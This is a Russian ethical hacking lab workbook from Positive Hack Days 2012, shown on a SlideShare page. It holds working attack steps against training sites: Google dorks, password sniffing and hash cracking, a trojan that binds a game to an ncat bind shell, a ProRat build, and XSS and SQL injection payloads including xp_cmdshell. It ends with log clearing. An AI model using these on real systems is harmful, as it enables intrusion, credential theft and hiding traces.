SlideShare ist ein Scribd-Unternehmen logo
1 von 16
Downloaden Sie, um offline zu lesen
Positive Hack Days 2012                                                        Сергей Клевогин



Этичный хакинг. Рабочая тетрадь.


Практическая работа 0. Методология СЕН.


Убедиться, что по методологии СЕН хакинг состоит из нескольких фаз:

   1.   Сбор данных
   2.   Сканирование и перечисление
   3.   Взлом системы и сервисов
   4.   Поддержка доступа
   5.   Скрытие следов

Для этого в Google набрать «Ethical Hacking Phases», перейти по первой же ссылке

http://hack-o-crack.blogspot.com/2010/12/five-stages-of-ethical-hacking.html

Посмотреть на текст.




Определить на какой фазе хакинга находится использование троянов, а на какой Metasploit.



                                                                                             1
Positive Hack Days 2012                                                             Сергей Клевогин

Практическая работа 1. Сбор данных.


Задача 1.
Убедиться, что существует Google Hacking Data Base.

Для этого в Google набрать «GHDB», перейти по первой же ссылке

http://www.hackersforcharity.org/ghdb/

Просмотреть различные типы запросов, позволяющие обнаружить:

       Бюллетени и уязвимости
       Сообщения об ошибках
       Файлы, содержащие интересную информацию
       Файлы, содержащие пароли
       Файлы, содержащие имена пользователей
       Страницы-плацдармы
       Страницы входа в порталы
       Страницы, содержащие данные о сети или уязвимостях
       Важные каталоги
       Важная информация о покупках в Интернете
       Различные онлайн устройства
       Уязвимые файлы
       Уязвимые серверы
       Сведения о веб-сервере



Покликать по ссылкам, чтобы посмотреть примеры запросов каждого типа.
Перейти к сообщениям об ошибках:

http://www.hackersforcharity.org/ghdb/?function=summary&cat=10

Обнаружить последнюю запись в базе данных. Обратить внимание на дату записи.



Для интереса перейти по первой ссылке

http://www.hackersforcharity.org/ghdb/?function=detail&id=143

и поискать в Google « intitle:”Nessus Scan Report” “This file was generated by Nessus” »:

Обнаружить уже готовый отчет об уязвимостях Nessus.

Проверить, не притаился ли подобный отчет об уязвимостях на сайте вашей организации.




                                                                                                  2
Positive Hack Days 2012                                                               Сергей Клевогин

Задача 2.
Поискать более новую базу данных GHDB.

Для этого в Google набрать «GHDB 2012», перейти по первой же ссылкe

http://www.exploit-db.com/google-dorks/

Обратить внимание на последние записи «Latest Google Hacking Entries».




Сравнить различные типы запросов с предыдущим списком. Не найти отличий.



Снова покликать по ссылкам, чтобы посмотреть примеры запросов каждого типа.
Перейти к сообщениям об ошибках:

http://www.exploit-db.com/google-dorks/7/

Перейти по первой ссылке

http://www.exploit-db.com/ghdb/3785/

и поиcкать в Google «inurl:"*.php?*=*.php" intext:"Warning: include" -inurl:.html -site:"php.net" -
site:"stackoverflow.com" -inurl:"*forums*"»

Найти реальный сервер в Интернете с сообщением об ошибке. Заглянуть на главную страницу
сайта. Оценить приличность дизайна.

Проверить, нет ли страниц с подобной ошибкой на сайте вашей организации.
                                                                                                      3
Positive Hack Days 2012                                                            Сергей Клевогин

Задача 3.
Познакомиться с Search Diggity.

http://www.stachliu.com/resources/tools/google-hacking-diggity-project/attack-tools/

Скачать и установить SearchDiggity. Пока устанавливается почитать справку.

Запустить SearchDiggity, идентифицировать элементы интерфейса.

Следуя указаниям справки:
       Создать API ключ. Завести аккаунт в Google, если его еще нет;
       Создать Google Custom Search ID;
       Выбрать сайт в окошке выбора сайта справа;
       Запустить сканирование вашего сайта, выбрав запросы GHDB.

Добиться результата подобного этому:




Изучить другие возможности DiggitySearch.



                                                                                                 4
Positive Hack Days 2012                                                       Сергей Клевогин

Задача 4.
Выкачать сайты Cars и Brown себе на компьютер.



Для этого скачать и установить httrack.




После установки обнаружить на компьютере графический интерфейс WinHTTrack
и средство командной строки httrack .

Один сайт загрузите, используя WinHTTrack, другой с использованием httrack.

Чтобы посмотреть синтаксис httrack используем

httrack --help




                                                                                            5
Positive Hack Days 2012                                             Сергей Клевогин

Практическая работа 2. Сканирование и перечисление.


Задача 0.
Познакомиться с теорией сканирования.

Для этого:

познакомиться с RFC 791, 792, 793. ( http://www.rfc-editor.org/ )



Зайти на сайт nmap:

http://nmap.org/man/ru/man-port-scanning-techniques.html

Познакомиться с основными приемами сканирования портов.




Добавить ссылку в избранное, чтобы потом повторно перечитать.



Узнать, что такое перечисление и какое оно бывает.

Для этого запомнить, что бывает:
       Перечисление NetBIOS
       Перечисление SNMP
       Перечисление UNIX
       Перечисление LDAP
       Перечисление NTP
       Перечисление SMTP
       Перечисление DNS



                                                                                  6
Positive Hack Days 2012                                                     Сергей Клевогин


Задача 1.
Просканировать сеть, обнаружить учебный веб-сервер.

Для этого скачать и установить nmap.



Изучить синтаксис nmap:

nmap --help



Запустить сканирование из интерфейса
командной строки:

nmap 192.168.1.0/25 -p80



Обнаружить системы с открытым 80 портом




Запустить сканирование из графического интерфейса и посмотреть результат.



Задача 2.
Обнаружить шлюз по умолчанию на целевой системе со включенным SNMP.

Для этого познакомиться с RFC1213, RFC 1157 и синтаксисом snmputil

Чтобы узнать шлюз нужно выполнить команду:

snmputil get CEH public .1.3.6.1.2.1.4.21.1.7.0.0.0.0




                                                                                          7
Positive Hack Days 2012                                                     Сергей Клевогин

Практическая работа 3. Хакинг системы.


Задача 0.
Познакомиться с архитектурой операционной системы.

Для этого в Google набрать «Архитектура Windows» и кликнуть Картинки




Картинки обычно сопровождаются статьями с полезной информацией.



То же самое повторить с архитектурой Linux/Unix.



Сделать вывод,что система взаимодействует с внешним миром через:
       драйверы, компоненты ядра (и даже прошивки оборудования);
       сетевые сервисы;
       клиентские приложения, которые обращаются на чужой сервер;
       любые приложения, которые скачиваются и запускаются в системе (трояны).


                                                                                          8
Positive Hack Days 2012                                                  Сергей Клевогин


Задача 1.
Подсмотреть пароль, передаваемый по сети.

Для этого скачать и установить Wireshark (http://www.wireshark.org )

Подключиться к любому серверу по любому незащищенному протоколу, требующему
аутентификацию.

Найти пароль в дампе Wireshark.




Если это пароль доменной учетной записи, то однажды подсмотренный через незащищенный
протокол, может быть использован через любой другой протокол.



Задача 2.
Подсмотреть все пароли, передаваемые по сети.

Скачать и установить Cain & Abel (http://www.oxid.it/cain.html )

Запустить сниффер.

Проявить сетевую активность, обратить внимание на захваченные пароли.




                                                                                       9
Positive Hack Days 2012                                                      Сергей Клевогин

Задача 3.
Атаковать хэши паролей.

В Cain & Abel на вкладке Cracker импортировать хэши паролей с локального компьютера.




Провести атаку на пароли локальных пользователей по словарю и брут-форсом.




                                                                                         10
Positive Hack Days 2012                              Сергей Клевогин


Задача 4.
Использование кейлоггера.

Установить PuntoSwitcher (http://punto.yandex.ru )

Включить возможность ведения дневника.

Увидеть, как в дневнике отображаются пароли.




                                                                 11
Positive Hack Days 2012                                                   Сергей Клевогин

Практическая работа 4. Поддержка доступа.


Задача 1.
Создать трояна, открывающего shell.

Для этого используя MicroJoiner объединить игру Gamux.exe с

ncat -l 8888 –e cmd




После запуска игры к компьютеру можно подключиться из командной строки:

ncat 192.168.1.14 8888




                                                                                      12
Positive Hack Days 2012                                                       Сергей Клевогин

Задача 2.
Создать трояна с помощью ProRat

Для этого скачать и запустить ProRat (http://www.prorat.net/downloads.php )

Сделать сервер, используя настройки по умолчанию и без уведомлений.




Запустить сервер, початиться с жертвой.




                                                                                          13
Positive Hack Days 2012                                    Сергей Клевогин

Практическая работа 5. Взлом веб-сервера посредством XSS


Задача 1.
Протестировать сайт Cars на возможность XSS.

Для этого попробовать добавить в Feedback сообщение:

hello <script>alert("PREVED")</script>



Задача 2.
Протестировать сайт Brown на возможность XSS.

Для этого попробовать добавить в Feedback сообщение:

hello <script>alert("PREVED")</script>




                                                                       14
Positive Hack Days 2012                                                            Сергей Клевогин

Практическая работа 6. Взлом посредством SQL - инъекции

Задача 0.
Познакомиться с теорией SQL инъекций.

Для этого можно использовать различные источники (http://ru.wikipedia.org/wiki )



Задача 1.
Обойти аутентификацию.

Для этого в форме ввода логина можно попробовать SQL инъекцию:

blah' or 1=1 --



Задача 2.
Идентифицировать число столбцов таблицы login_t базы данных Cars.

Для этого в форме ввода логина пробуем SQL инъекцию:

1' UNION SELECT 1,..,N ;-- и следим за логикой приложения

При инъекции 1' UNION SELECT 1,2,3 ;--

ответ приложения изменится, значит, сервер принял запрос и в таблице три поля.




                                                                                               15
Positive Hack Days 2012                                                            Сергей Клевогин

Задача 3.
Создать пользователя в базе данных SQL.

Для этого будем пробовать различные SQL инъекции:

blah';insert into login_t values ('xaker','123');--




В случае успешной инъекции получится зайти в систему с новой учетной записью.



Задача 4.
Выполнить команду на сервере.

Потестируем возможности выполнения различных команд. Например,

'; exec master..xp_cmdshell 'ipconfig/all > C:inetpubwwwrootbrownipconfig.txt';--

В случае успеха результат команды будет доступен через URL

http://ceh/Brown/ipconfig.txt



Практическая работа 7. Скрытие следов.


Удалить все программы и временные файлы, почистить логи и ключи реестра.
                                                                                               16

Weitere ähnliche Inhalte

Was ist angesagt?

Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016Sergey Soldatov
 
разработка безопасного кода
разработка безопасного кодаразработка безопасного кода
разработка безопасного кодаAndrey Somsikov
 
автоматизируем пентест Wifi сети
автоматизируем пентест Wifi сетиавтоматизируем пентест Wifi сети
автоматизируем пентест Wifi сетиOlesya Shelestova
 
Практика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструментыПрактика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструментыSergey Soldatov
 
Корреляция в SIEM системах
Корреляция в SIEM системахКорреляция в SIEM системах
Корреляция в SIEM системахOlesya Shelestova
 
Информационная безопасность и web-приложения
Информационная безопасность и web-приложенияИнформационная безопасность и web-приложения
Информационная безопасность и web-приложенияMaxim Krentovskiy
 
Что такое пентест
Что такое пентестЧто такое пентест
Что такое пентестDmitry Evteev
 
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условиях
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условияхАнализ защищенности Web-приложений, выявление уязвимостей в реальных условиях
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условияхDmitry Evteev
 
Целевые атаки: прицелься первым
Целевые атаки: прицелься первымЦелевые атаки: прицелься первым
Целевые атаки: прицелься первымPositive Hack Days
 
Опыт расследования инцидентов в коммерческих банках
Опыт расследования инцидентов в коммерческих банкахОпыт расследования инцидентов в коммерческих банках
Опыт расследования инцидентов в коммерческих банкахАйдар Гилязов
 
Magic Box, или Как пришлось сломать банкоматы, чтобы их спасти
Magic Box, или Как пришлось сломать банкоматы, чтобы их спастиMagic Box, или Как пришлось сломать банкоматы, чтобы их спасти
Magic Box, или Как пришлось сломать банкоматы, чтобы их спастиPositive Hack Days
 
RuSIEM. Потребители. Состав продукта. Отличия. Применение.
RuSIEM. Потребители. Состав продукта. Отличия. Применение.RuSIEM. Потребители. Состав продукта. Отличия. Применение.
RuSIEM. Потребители. Состав продукта. Отличия. Применение.Olesya Shelestova
 
Как начать тестировать безопасность уже сегодня
Как начать тестировать безопасность уже сегодняКак начать тестировать безопасность уже сегодня
Как начать тестировать безопасность уже сегодняSergey Belov
 
Один день из жизни специалиста по ИБ: процедура управления инцидентами, выявл...
Один день из жизни специалиста по ИБ: процедура управления инцидентами, выявл...Один день из жизни специалиста по ИБ: процедура управления инцидентами, выявл...
Один день из жизни специалиста по ИБ: процедура управления инцидентами, выявл...Solar Security
 
Под капотом Vulners
Под капотом VulnersПод капотом Vulners
Под капотом VulnersKirill Ermakov
 
Cis critical security controls. контроль 3 безопасная конфигурация устройств
Cis critical security controls. контроль 3   безопасная конфигурация устройствCis critical security controls. контроль 3   безопасная конфигурация устройств
Cis critical security controls. контроль 3 безопасная конфигурация устройствTeymur Kheirkhabarov
 
Истории из жизни. Как взламывают сети крупных организаций.
Истории из жизни. Как взламывают сети крупных организаций.Истории из жизни. Как взламывают сети крупных организаций.
Истории из жизни. Как взламывают сети крупных организаций.Dmitry Evteev
 

Was ist angesagt? (20)

Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016Охота на угрозы на BIS summit 2016
Охота на угрозы на BIS summit 2016
 
разработка безопасного кода
разработка безопасного кодаразработка безопасного кода
разработка безопасного кода
 
автоматизируем пентест Wifi сети
автоматизируем пентест Wifi сетиавтоматизируем пентест Wifi сети
автоматизируем пентест Wifi сети
 
Практика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструментыПрактика обнаружения атак, использующих легальные инструменты
Практика обнаружения атак, использующих легальные инструменты
 
Корреляция в SIEM системах
Корреляция в SIEM системахКорреляция в SIEM системах
Корреляция в SIEM системах
 
Информационная безопасность и web-приложения
Информационная безопасность и web-приложенияИнформационная безопасность и web-приложения
Информационная безопасность и web-приложения
 
Что такое пентест
Что такое пентестЧто такое пентест
Что такое пентест
 
SIEM для ИТ
SIEM для ИТSIEM для ИТ
SIEM для ИТ
 
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условиях
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условияхАнализ защищенности Web-приложений, выявление уязвимостей в реальных условиях
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условиях
 
Целевые атаки: прицелься первым
Целевые атаки: прицелься первымЦелевые атаки: прицелься первым
Целевые атаки: прицелься первым
 
Опыт расследования инцидентов в коммерческих банках
Опыт расследования инцидентов в коммерческих банкахОпыт расследования инцидентов в коммерческих банках
Опыт расследования инцидентов в коммерческих банках
 
пр Про DLP Dozor v6
пр Про DLP Dozor v6пр Про DLP Dozor v6
пр Про DLP Dozor v6
 
Magic Box, или Как пришлось сломать банкоматы, чтобы их спасти
Magic Box, или Как пришлось сломать банкоматы, чтобы их спастиMagic Box, или Как пришлось сломать банкоматы, чтобы их спасти
Magic Box, или Как пришлось сломать банкоматы, чтобы их спасти
 
RuSIEM. Потребители. Состав продукта. Отличия. Применение.
RuSIEM. Потребители. Состав продукта. Отличия. Применение.RuSIEM. Потребители. Состав продукта. Отличия. Применение.
RuSIEM. Потребители. Состав продукта. Отличия. Применение.
 
Как начать тестировать безопасность уже сегодня
Как начать тестировать безопасность уже сегодняКак начать тестировать безопасность уже сегодня
Как начать тестировать безопасность уже сегодня
 
Один день из жизни специалиста по ИБ: процедура управления инцидентами, выявл...
Один день из жизни специалиста по ИБ: процедура управления инцидентами, выявл...Один день из жизни специалиста по ИБ: процедура управления инцидентами, выявл...
Один день из жизни специалиста по ИБ: процедура управления инцидентами, выявл...
 
Под капотом Vulners
Под капотом VulnersПод капотом Vulners
Под капотом Vulners
 
Cis critical security controls. контроль 3 безопасная конфигурация устройств
Cis critical security controls. контроль 3   безопасная конфигурация устройствCis critical security controls. контроль 3   безопасная конфигурация устройств
Cis critical security controls. контроль 3 безопасная конфигурация устройств
 
DNS как улика
DNS как уликаDNS как улика
DNS как улика
 
Истории из жизни. Как взламывают сети крупных организаций.
Истории из жизни. Как взламывают сети крупных организаций.Истории из жизни. Как взламывают сети крупных организаций.
Истории из жизни. Как взламывают сети крупных организаций.
 

Andere mochten auch

Сообщество DevOpsHQ: идеология и инструменты | Александр Паздников
Сообщество DevOpsHQ: идеология и инструменты | Александр ПаздниковСообщество DevOpsHQ: идеология и инструменты | Александр Паздников
Сообщество DevOpsHQ: идеология и инструменты | Александр ПаздниковPositive Hack Days
 
TeamPass - управление разграничением доступа к сервисным паролям в команде | ...
TeamPass - управление разграничением доступа к сервисным паролям в команде | ...TeamPass - управление разграничением доступа к сервисным паролям в команде | ...
TeamPass - управление разграничением доступа к сервисным паролям в команде | ...Positive Hack Days
 
Using Facebook for Online Courses
Using Facebook for Online CoursesUsing Facebook for Online Courses
Using Facebook for Online CoursesBeth Gallaway
 
Introducción a las vulnerabilidades web
Introducción a las vulnerabilidades webIntroducción a las vulnerabilidades web
Introducción a las vulnerabilidades webPablo Garaizar
 
Aндрей Mасалович. Конкурентная разведка в Интернете.
Aндрей Mасалович. Конкурентная разведка в Интернете.Aндрей Mасалович. Конкурентная разведка в Интернете.
Aндрей Mасалович. Конкурентная разведка в Интернете.Positive Hack Days
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Positive Hack Days
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesPablo Garaizar
 
Pentadbiran buruh di malaysia kajian kes terkini
Pentadbiran buruh di malaysia kajian kes terkiniPentadbiran buruh di malaysia kajian kes terkini
Pentadbiran buruh di malaysia kajian kes terkinirashidin76
 
Метод машинного обучения для распознавания сгенерированных доменных имен
Метод машинного обучения для распознавания сгенерированных доменных именМетод машинного обучения для распознавания сгенерированных доменных имен
Метод машинного обучения для распознавания сгенерированных доменных именPositive Hack Days
 
Доставка зловредов через облака
Доставка зловредов через облакаДоставка зловредов через облака
Доставка зловредов через облакаPositive Hack Days
 
Возможно, время не на твоей стороне. Реализация атаки по времени в браузере
Возможно, время не на твоей стороне. Реализация атаки по времени в браузереВозможно, время не на твоей стороне. Реализация атаки по времени в браузере
Возможно, время не на твоей стороне. Реализация атаки по времени в браузереPositive Hack Days
 
Практические рекомендации по использованию системы TestRail | Дмитрий Рыльцов...
Практические рекомендации по использованию системы TestRail | Дмитрий Рыльцов...Практические рекомендации по использованию системы TestRail | Дмитрий Рыльцов...
Практические рекомендации по использованию системы TestRail | Дмитрий Рыльцов...Positive Hack Days
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12BGA Cyber Security
 
Internet Safety For Kids (for grownups)
Internet Safety For Kids (for grownups)Internet Safety For Kids (for grownups)
Internet Safety For Kids (for grownups)Ian Lurie
 
Cours en Master 2 IEP Journalisme 2009-2010
Cours en Master 2 IEP Journalisme 2009-2010Cours en Master 2 IEP Journalisme 2009-2010
Cours en Master 2 IEP Journalisme 2009-2010Alexandre Serres
 
Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...
Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...
Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...Bishop Fox
 
23k guestbooks mix
23k guestbooks mix23k guestbooks mix
23k guestbooks mixWaleed Ahmad
 

Andere mochten auch (20)

Сообщество DevOpsHQ: идеология и инструменты | Александр Паздников
Сообщество DevOpsHQ: идеология и инструменты | Александр ПаздниковСообщество DevOpsHQ: идеология и инструменты | Александр Паздников
Сообщество DevOpsHQ: идеология и инструменты | Александр Паздников
 
Tapping into the core
Tapping into the coreTapping into the core
Tapping into the core
 
TeamPass - управление разграничением доступа к сервисным паролям в команде | ...
TeamPass - управление разграничением доступа к сервисным паролям в команде | ...TeamPass - управление разграничением доступа к сервисным паролям в команде | ...
TeamPass - управление разграничением доступа к сервисным паролям в команде | ...
 
Using Facebook for Online Courses
Using Facebook for Online CoursesUsing Facebook for Online Courses
Using Facebook for Online Courses
 
Introducción a las vulnerabilidades web
Introducción a las vulnerabilidades webIntroducción a las vulnerabilidades web
Introducción a las vulnerabilidades web
 
Aндрей Mасалович. Конкурентная разведка в Интернете.
Aндрей Mасалович. Конкурентная разведка в Интернете.Aндрей Mасалович. Конкурентная разведка в Интернете.
Aндрей Mасалович. Конкурентная разведка в Интернете.
 
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.
 
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidadesLa Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades
 
Google Dorks
Google DorksGoogle Dorks
Google Dorks
 
Pentadbiran buruh di malaysia kajian kes terkini
Pentadbiran buruh di malaysia kajian kes terkiniPentadbiran buruh di malaysia kajian kes terkini
Pentadbiran buruh di malaysia kajian kes terkini
 
Sourcer's Daily Dozen - Glenn Gutmacher
Sourcer's Daily Dozen - Glenn GutmacherSourcer's Daily Dozen - Glenn Gutmacher
Sourcer's Daily Dozen - Glenn Gutmacher
 
Метод машинного обучения для распознавания сгенерированных доменных имен
Метод машинного обучения для распознавания сгенерированных доменных именМетод машинного обучения для распознавания сгенерированных доменных имен
Метод машинного обучения для распознавания сгенерированных доменных имен
 
Доставка зловредов через облака
Доставка зловредов через облакаДоставка зловредов через облака
Доставка зловредов через облака
 
Возможно, время не на твоей стороне. Реализация атаки по времени в браузере
Возможно, время не на твоей стороне. Реализация атаки по времени в браузереВозможно, время не на твоей стороне. Реализация атаки по времени в браузере
Возможно, время не на твоей стороне. Реализация атаки по времени в браузере
 
Практические рекомендации по использованию системы TestRail | Дмитрий Рыльцов...
Практические рекомендации по использованию системы TestRail | Дмитрий Рыльцов...Практические рекомендации по использованию системы TestRail | Дмитрий Рыльцов...
Практические рекомендации по использованию системы TestRail | Дмитрий Рыльцов...
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
 
Internet Safety For Kids (for grownups)
Internet Safety For Kids (for grownups)Internet Safety For Kids (for grownups)
Internet Safety For Kids (for grownups)
 
Cours en Master 2 IEP Journalisme 2009-2010
Cours en Master 2 IEP Journalisme 2009-2010Cours en Master 2 IEP Journalisme 2009-2010
Cours en Master 2 IEP Journalisme 2009-2010
 
Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...
Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...
Black Hat USA 2016 - Highway to the Danger Drone - 03Aug2016 - Slides - UPDAT...
 
23k guestbooks mix
23k guestbooks mix23k guestbooks mix
23k guestbooks mix
 

Ähnlich wie Этичный хакинг

Эволюция BackDoor.Flashback
Эволюция BackDoor.FlashbackЭволюция BackDoor.Flashback
Эволюция BackDoor.Flashbackhexminer
 
Как быть с большими сайтами на Word press
Как быть с большими сайтами  на Word pressКак быть с большими сайтами  на Word press
Как быть с большими сайтами на Word pressvovasik
 
Уязвимости веб-сервисов
Уязвимости веб-сервисовУязвимости веб-сервисов
Уязвимости веб-сервисовPositive Hack Days
 
Леонид Васильев "Python в инфраструктуре поиска"
Леонид Васильев "Python в инфраструктуре поиска"Леонид Васильев "Python в инфраструктуре поиска"
Леонид Васильев "Python в инфраструктуре поиска"Yandex
 
Михаил Давыдов "Масштабируемые JavaScript-приложения"
Михаил Давыдов "Масштабируемые JavaScript-приложения"Михаил Давыдов "Масштабируемые JavaScript-приложения"
Михаил Давыдов "Масштабируемые JavaScript-приложения"Yandex
 
Опенсорс-инструменты на страже безопасности бэкенда — Петр Волков
Опенсорс-инструменты на страже безопасности бэкенда — Петр ВолковОпенсорс-инструменты на страже безопасности бэкенда — Петр Волков
Опенсорс-инструменты на страже безопасности бэкенда — Петр ВолковYandex
 
Как перестать хранить секреты в git и начать использовать Hashicorp Vault
Как перестать хранить секреты в git и начать использовать Hashicorp VaultКак перестать хранить секреты в git и начать использовать Hashicorp Vault
Как перестать хранить секреты в git и начать использовать Hashicorp VaultOleg Mykolaichenko
 
Популярні способи зломів та шахрайські схеми
Популярні способи зломів та шахрайські схемиПопулярні способи зломів та шахрайські схеми
Популярні способи зломів та шахрайські схемиAvivi Academy
 
Easy authcache 2 кэширование для pro. Родионов Игорь
Easy authcache 2   кэширование для pro. Родионов ИгорьEasy authcache 2   кэширование для pro. Родионов Игорь
Easy authcache 2 кэширование для pro. Родионов ИгорьPVasili
 
Drupal code sprint для новичков
Drupal code sprint для новичковDrupal code sprint для новичков
Drupal code sprint для новичковOvadiah Myrgorod
 
Анализ работы антивирусных лабораторий
Анализ работы антивирусных лабораторийАнализ работы антивирусных лабораторий
Анализ работы антивирусных лабораторийPositive Hack Days
 
Олег Миколайченко "Как перестать хранить секреты в git и начать использовать ...
Олег Миколайченко "Как перестать хранить секреты в git и начать использовать ...Олег Миколайченко "Как перестать хранить секреты в git и начать использовать ...
Олег Миколайченко "Как перестать хранить секреты в git и начать использовать ...Fwdays
 
ThinkJavaKharkiv#1 Шеф, все пропало. Проблемы с Production
ThinkJavaKharkiv#1 Шеф, все пропало. Проблемы с ProductionThinkJavaKharkiv#1 Шеф, все пропало. Проблемы с Production
ThinkJavaKharkiv#1 Шеф, все пропало. Проблемы с ProductionVladimir Malinin
 
Easy authcache 2 кеширование для pro родионов игорь
Easy authcache 2   кеширование для pro родионов игорьEasy authcache 2   кеширование для pro родионов игорь
Easy authcache 2 кеширование для pro родионов игорьdrupalconf
 
Penetration testing (AS IS)
Penetration testing (AS IS)Penetration testing (AS IS)
Penetration testing (AS IS)Dmitry Evteev
 
Как обезопасить PBN от взлома? Практические рекомендации
Как обезопасить PBN от взлома? Практические рекомендацииКак обезопасить PBN от взлома? Практические рекомендации
Как обезопасить PBN от взлома? Практические рекомендацииNaZapad
 
Евгений Жарков "Как быть хорошим фронтенд-разработчиком"
Евгений Жарков "Как быть хорошим фронтенд-разработчиком"Евгений Жарков "Как быть хорошим фронтенд-разработчиком"
Евгений Жарков "Как быть хорошим фронтенд-разработчиком"Fwdays
 

Ähnlich wie Этичный хакинг (20)

Эволюция BackDoor.Flashback
Эволюция BackDoor.FlashbackЭволюция BackDoor.Flashback
Эволюция BackDoor.Flashback
 
Как быть с большими сайтами на Word press
Как быть с большими сайтами  на Word pressКак быть с большими сайтами  на Word press
Как быть с большими сайтами на Word press
 
Уязвимости веб-сервисов
Уязвимости веб-сервисовУязвимости веб-сервисов
Уязвимости веб-сервисов
 
Леонид Васильев "Python в инфраструктуре поиска"
Леонид Васильев "Python в инфраструктуре поиска"Леонид Васильев "Python в инфраструктуре поиска"
Леонид Васильев "Python в инфраструктуре поиска"
 
Михаил Давыдов "Масштабируемые JavaScript-приложения"
Михаил Давыдов "Масштабируемые JavaScript-приложения"Михаил Давыдов "Масштабируемые JavaScript-приложения"
Михаил Давыдов "Масштабируемые JavaScript-приложения"
 
php frameworks
php frameworksphp frameworks
php frameworks
 
Опенсорс-инструменты на страже безопасности бэкенда — Петр Волков
Опенсорс-инструменты на страже безопасности бэкенда — Петр ВолковОпенсорс-инструменты на страже безопасности бэкенда — Петр Волков
Опенсорс-инструменты на страже безопасности бэкенда — Петр Волков
 
Как перестать хранить секреты в git и начать использовать Hashicorp Vault
Как перестать хранить секреты в git и начать использовать Hashicorp VaultКак перестать хранить секреты в git и начать использовать Hashicorp Vault
Как перестать хранить секреты в git и начать использовать Hashicorp Vault
 
Популярні способи зломів та шахрайські схеми
Популярні способи зломів та шахрайські схемиПопулярні способи зломів та шахрайські схеми
Популярні способи зломів та шахрайські схеми
 
Easy authcache 2 кэширование для pro. Родионов Игорь
Easy authcache 2   кэширование для pro. Родионов ИгорьEasy authcache 2   кэширование для pro. Родионов Игорь
Easy authcache 2 кэширование для pro. Родионов Игорь
 
Drupal code sprint для новичков
Drupal code sprint для новичковDrupal code sprint для новичков
Drupal code sprint для новичков
 
Анализ работы антивирусных лабораторий
Анализ работы антивирусных лабораторийАнализ работы антивирусных лабораторий
Анализ работы антивирусных лабораторий
 
Олег Миколайченко "Как перестать хранить секреты в git и начать использовать ...
Олег Миколайченко "Как перестать хранить секреты в git и начать использовать ...Олег Миколайченко "Как перестать хранить секреты в git и начать использовать ...
Олег Миколайченко "Как перестать хранить секреты в git и начать использовать ...
 
Dapper + QueryObject
Dapper + QueryObjectDapper + QueryObject
Dapper + QueryObject
 
ThinkJavaKharkiv#1 Шеф, все пропало. Проблемы с Production
ThinkJavaKharkiv#1 Шеф, все пропало. Проблемы с ProductionThinkJavaKharkiv#1 Шеф, все пропало. Проблемы с Production
ThinkJavaKharkiv#1 Шеф, все пропало. Проблемы с Production
 
Easy authcache 2 кеширование для pro родионов игорь
Easy authcache 2   кеширование для pro родионов игорьEasy authcache 2   кеширование для pro родионов игорь
Easy authcache 2 кеширование для pro родионов игорь
 
Penetration testing (AS IS)
Penetration testing (AS IS)Penetration testing (AS IS)
Penetration testing (AS IS)
 
Как обезопасить PBN от взлома? Практические рекомендации
Как обезопасить PBN от взлома? Практические рекомендацииКак обезопасить PBN от взлома? Практические рекомендации
Как обезопасить PBN от взлома? Практические рекомендации
 
Highload 2011-demona
Highload 2011-demonaHighload 2011-demona
Highload 2011-demona
 
Евгений Жарков "Как быть хорошим фронтенд-разработчиком"
Евгений Жарков "Как быть хорошим фронтенд-разработчиком"Евгений Жарков "Как быть хорошим фронтенд-разработчиком"
Евгений Жарков "Как быть хорошим фронтенд-разработчиком"
 

Mehr von Positive Hack Days

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesPositive Hack Days
 
Как мы собираем проекты в выделенном окружении в Windows Docker
